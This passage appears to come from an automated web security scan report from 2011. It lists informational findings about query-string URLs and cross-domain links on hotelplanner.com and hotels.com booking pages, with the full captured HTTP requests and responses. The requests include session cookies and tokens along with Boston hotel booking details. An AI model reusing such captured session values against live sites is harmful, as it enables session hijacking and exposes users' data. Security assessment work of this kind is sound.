           <a href="javascript:ShowPhoto(17);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_39_t.jpg" border="2" width="64" height="64" hspace="5" alt="Living Area"></a>
...[SNIP]...
<a href="javascript:ShowPhoto(18);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_40_t.jpg" border="2" width="64" height="64" hspace="5" alt="Guest Room"></a>
           
           <a href="javascript:ShowPhoto(19);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_41_t.jpg" border="2" width="64" height="64" hspace="5" alt="Dining"></a>
           
           <a href="javascript:ShowPhoto(20);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_42_t.jpg" border="2" width="64" height="64" hspace="5" alt="Exterior"></a>
           
           <a href="javascript:ShowPhoto(21);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_43_t.jpg" border="2" width="64" height="64" hspace="5" alt="Guest Room"></a>
           
           <a href="javascript:ShowPhoto(22);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_44_t.jpg" border="2" width="64" height="64" hspace="5" alt="Interior"></a>
           
           <a href="javascript:ShowPhoto(23);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_45_t.jpg" border="2" width="64" height="64" hspace="5" alt="Dining"></a>
           
           <a href="javascript:ShowPhoto(24);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_46_t.jpg" border="2" width="64" height="64" hspace="5" alt="Dining"></a>
           
           <a href="javascript:ShowPhoto(25);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_47_t.jpg" border="2" width="64" height="64" hspace="5" alt="Ballroom/Banquet"></a>
           
           <a href="javascript:ShowPhoto(26);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_48_t.jpg" border="2" width="64" height="64" hspace="5" alt="Business Center"></a>
...[SNIP]...
<a href="javascript:ShowPhoto(27);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_49_t.jpg" border="2" width="64" height="64" hspace="5" alt="Dining"></a>
           
           <a href="javascript:ShowPhoto(28);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_50_t.jpg" border="2" width="64" height="64" hspace="5" alt="Meeting Facility"></a>
           
           <a href="javascript:ShowPhoto(29);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_51_t.jpg" border="2" width="64" height="64" hspace="5" alt="Bath"></a>
           
           <a href="javascript:ShowPhoto(30);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_53_t.jpg" border="2" width="64" height="64" hspace="5" alt="Lounge/Bar"></a>
...[SNIP]...
</a>&nbsp;-&nbsp;<a href="http://maps.google.com/maps?f=d&hl=en&geocode=&saddr=&daddr=26%20North%20St%2C%20Boston%2C%20MA%2002109&ie=UTF8&z=16" target="_blank">Driving Directions</a>
...[SNIP]...
<td align="right" valign="top">
                   <img src="http://www.tripadvisor.com/img/cdsi/img2/ratings/traveler/4.0-11539-1.gif" alt="" border="0"><br>
...[SNIP]...
<td><img src="http://www.tripadvisor.com/img/cdsi/img2/ratings/traveler/3.0-11539-1.gif" alt="User rating of 3 on a scale of 1-5" width="118" height="20" border="0">&nbsp;&nbsp;<strong>
...[SNIP]...
<td><img src="http://www.tripadvisor.com/img/cdsi/img2/ratings/traveler/4.0-11539-1.gif" alt="User rating of 4 on a scale of 1-5" width="118" height="20" border="0">&nbsp;&nbsp;<strong>
...[SNIP]...
<td><img src="http://www.tripadvisor.com/img/cdsi/img2/ratings/traveler/4.0-11539-1.gif" alt="User rating of 4 on a scale of 1-5" width="118" height="20" border="0">&nbsp;&nbsp;<strong>
...[SNIP]...
<td><img src="http://www.tripadvisor.com/img/cdsi/img2/ratings/traveler/4.0-11539-1.gif" alt="User rating of 4 on a scale of 1-5" width="118" height="20" border="0">&nbsp;&nbsp;<strong>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<td align="center" WIDTH="135" rowspan="2">
               
                   <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fhotelplanner&amp;layout=button_count&amp;show_faces=false&amp;width=46&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:46px; height:21px;" allowTransparency="true"></iframe> <a href="http://www.facebook.com/hotelplanner?v=app_6009294086" target="_blank"><img src="//cdn.hotelplanner.com/Common/Images/FacebookSmall.gif" hspace="2" alt="" border="0"></a>
                   <a href="http://twitter.com/hotelplanner" target="_blank"><img src="//cdn.hotelplanner.com/Common/Images/TwitterSmall.gif" alt="" border="0"></a>
                   <a href="http://www.youtube.com/user/HotelPlanner30" target="_blank"><img src="//cdn.hotelplanner.com/Common/Images/YouTubeSmall.gif" alt="" border="0">
...[SNIP]...
<br>
                   <a href="http://itunes.apple.com/us/app/hotel-planner-hotel-deals/id420759661?mt=8" target="_blank"><img src="//cdn.hotelplanner.com/Common/Images/Iphone-HotelPlanner.gif" alt="Hotel Planner iPhone App" style="margin-top:6px;" border="0"></a><a href="https://market.android.com/details?id=com.hotelplanner.activity" target="_blank"><img src="//cdn.hotelplanner.com/Common/Images/Android-HotelPlanner.gif" alt="Hotel Planner Android App" style="margin-top:6px;" border="0">
...[SNIP]...

19.197. http://www.hotelplanner.com/Search/Index.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:10:06 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:10:06 GMT;path=/
Vary: Accept-Encoding
Content-Length: 225194


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
</script>
       <script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/010000/010158A-thumb.jpg" width="64" height="64" border="1" alt="Millennium Bostonian Hotel Boston" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=109368&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/004000/004810A-thumb.jpg" width="64" height="64" border="1" alt="Boston Omni Parker House Hotel" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=148554&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/044000/044777A-thumb.jpg" width="64" height="64" border="1" alt="Hilton Boston Downtown / Financial District" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=106118&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/001000/001013A-thumb.jpg" width="64" height="64" border="1" alt="Boston Marriott Long Wharf" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=216642&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/010000/010348A-thumb.jpg" width="64" height="64" border="1" alt="Onyx Hotel, a Kimpton Hotel" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=116085&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/013000/013360A-thumb.jpg" width="64" height="64" border="1" alt="Hyatt Regency Boston" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=277552&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/103000/103982A-thumb.jpg" width="64" height="64" border="1" alt="Fairmont Battery Wharf Boston" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=324884&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/114000/114273A-thumb.jpg" width="64" height="64" border="1" alt="W Boston" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=115103&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/012000/012062A-thumb.jpg" width="64" height="64" border="1" alt="Four Seasons Boston" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=255157&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/025000/025299A-thumb.jpg" width="64" height="64" border="1" alt="The Liberty Hotel - A Starwood Luxury Collection Hotel" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=109107&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/004000/004470A-thumb.jpg" width="64" height="64" border="1" alt="Radisson Boston Hotel" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=122147&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/021000/021745A-thumb.jpg" width="64" height="64" border="1" alt="The Boston Park Plaza Hotel &amp; Towers" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=152759&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/012000/012018A-thumb.jpg" width="64" height="64" border="1" alt="Royal Sonesta Hotel Boston" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=207768&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/046000/046065A-thumb.jpg" width="64" height="64" border="1" alt="Hotel Marlowe, a Kimpton Hotel" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=242136&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/070000/070926A-thumb.jpg" width="64" height="64" border="1" alt="The Westin Boston Waterfront" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=105311&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/000000/MM000013-thumb.jpg" width="64" height="64" border="1" alt="The Westin Copley Place" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=114172&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/010000/010677A-thumb.jpg" width="64" height="64" border="1" alt="Copley Square Hotel" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=106307&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/001000/001228A-thumb.jpg" width="64" height="64" border="1" alt="Marriott Boston Copley Place" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=219844&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/012000/012989A-thumb.jpg" width="64" height="64" border="1" alt="Marriott Cambridge" hspace="2" vspace="2"></a>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<td align="center" WIDTH="135" rowspan="2">
               
                   <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fhotelplanner&amp;layout=button_count&amp;show_faces=false&amp;width=46&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:46px; height:21px;" allowTransparency="true"></iframe> <a href="http://www.facebook.com/hotelplanner?v=app_6009294086" target="_blank"><img src="//cdn.hotelplanner.com/Common/Images/FacebookSmall.gif" hspace="2" alt="" border="0"></a>
                   <a href="http://twitter.com/hotelplanner" target="_blank"><img src="//cdn.hotelplanner.com/Common/Images/TwitterSmall.gif" alt="" border="0"></a>
                   <a href="http://www.youtube.com/user/HotelPlanner30" target="_blank"><img src="//cdn.hotelplanner.com/Common/Images/YouTubeSmall.gif" alt="" border="0">
...[SNIP]...
<br>
                   <a href="http://itunes.apple.com/us/app/hotel-planner-hotel-deals/id420759661?mt=8" target="_blank"><img src="//cdn.hotelplanner.com/Common/Images/Iphone-HotelPlanner.gif" alt="Hotel Planner iPhone App" style="margin-top:6px;" border="0"></a><a href="https://market.android.com/details?id=com.hotelplanner.activity" target="_blank"><img src="//cdn.hotelplanner.com/Common/Images/Android-HotelPlanner.gif" alt="Hotel Planner Android App" style="margin-top:6px;" border="0">
...[SNIP]...

19.198. https://www.hotelplanner.com/Accept/Reserve.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The page was loaded from a URL containing a query string (the POST request below). The response contains the following link to another domain:

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:30:37 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58824

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<td valign="top" colspan="2" align="center">
   <script src=https://seal.verisign.com/getseal?host_name=WWW.HOTELPLANNER.COM&size=S&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...

19.199. http://www.hotels.com/hotel/details.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /hotel/details.html

Issue detail

The page was loaded from a URL containing a query string (the request below). The response contains the following links to other domains:

Request

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:31:07 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:28:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=H7gAAAAAAAIAAAAAAAAAAAAAAAYAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:28:19 GMT
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:28:19 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:28:19 GMT; Path=/
Content-Length: 238921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:
...[SNIP]...
<div class="tweet">
<a href="http://twitter.com/share" class="twitter-share-button">Tweet</a>
...[SNIP]...
<li class="delicious">
<a class="hcomPopup" href="http://del.icio.us/post?url=www.hotels.com%2Fho109368%2Fboston-omni-parker-house-hotel-boston-united-states%2F" title="Del.icio.us" rel="nofollow" target="_blank" >
<span class="icon">
...[SNIP]...
<li class="google">
<a class="hcomPopup" href="http://www.google.com/bookmarks/mark?op=edit&bkmk=www.hotels.com%2Fho109368%2Fboston-omni-parker-house-hotel-boston-united-states%2F" title="Google" rel="nofollow" target="_blank" >
<span class="icon">
...[SNIP]...
<li class="squidoo">
<a class="hcomPopup" href="http://www.squidoo.com/lensmaster/bookmark?www.hotels.com%2Fho109368%2Fboston-omni-parker-house-hotel-boston-united-states%2F" title="Squidoo" rel="nofollow" target="_blank" >
<span class="icon">
...[SNIP]...
<li class="reddit">
<a class="hcomPopup" href="http://reddit.com/submit?url=www.hotels.com%2Fho109368%2Fboston-omni-parker-house-hotel-boston-united-states%2F" title="Reddit" rel="nofollow" target="_blank" >
<span class="icon">
...[SNIP]...
<li class="myspace">
<a class="hcomPopup" href="http://www.myspace.com/Modules/PostTo/Pages/?u=www.hotels.com%2Fho109368%2Fboston-omni-parker-house-hotel-boston-united-states%2F" title="MySpace" rel="nofollow" target="_blank" >
<span class="icon">
...[SNIP]...
<li class="facebook">
<a class="hcomPopup" href="http://www.facebook.com/sharer.php?u=www.hotels.com%2Fho109368%2Fboston-omni-parker-house-hotel-boston-united-states%2F" title="Facebook" rel="nofollow" target="_blank" >
<span class="icon">
...[SNIP]...
<li class="digg">
<a class="hcomPopup" href="http://digg.com/submit?phase=2&url=www.hotels.com%2Fho109368%2Fboston-omni-parker-house-hotel-boston-united-states%2F" title="Digg" rel="nofollow" target="_blank" >
<span class="icon">
...[SNIP]...
<li class="stumbleupon">
<a class="hcomPopup" href="http://www.stumbleupon.com/submit?url=www.hotels.com%2Fho109368%2Fboston-omni-parker-house-hotel-boston-united-states%2F" title="StumbleUpon" rel="nofollow" target="_blank" >
<span class="icon">
...[SNIP]...
<li class="yahoo">
<a class="hcomPopup" href="http://myweb2.search.yahoo.com/myresults/bookmarklet?u=www.hotels.com%2Fho109368%2Fboston-omni-parker-house-hotel-boston-united-states%2F" title="Yahoo" rel="nofollow" target="_blank" >
<span class="icon">
...[SNIP]...
<div class="rd_hd-thumbnail_map_image">
<img src="http://maps.google.com/maps/api/staticmap?center=42.35777,-71.05963&zoom=15&size=300x215&sensor=false&markers=icon:http%3A%2F%2Fwww.hotels.com%2Fimages%2Fstatic%2Fmap%2Fmap_pin_hotel_active_us.png%7C42.35777,-71.05963&client=gme-expedia&signature=N0P97oo2bRTQeZ1y0AVam8ESX6k=" alt="Boston Omni Parker House Hotel" />
</div>
...[SNIP]...
<div class="static_map_container">
<img class="js_hidden" src="http://maps.google.com/maps/api/staticmap?center=42.35777,-71.05963&zoom=16&size=834x443&sensor=false&markers=icon:http%3A%2F%2Fwww.hotels.com%2Fimages%2Fstatic%2Fmap%2Fmap_pin_hotel_active_us.png%7C42.35777,-71.05963&client=gme-expedia&signature=WQl3hmQ9XXpkOtrcmzX577lr-Ww=" alt="" height="443" width="834" />
</div>
...[SNIP]...
<div class="opinionlab_bottom clearfix">
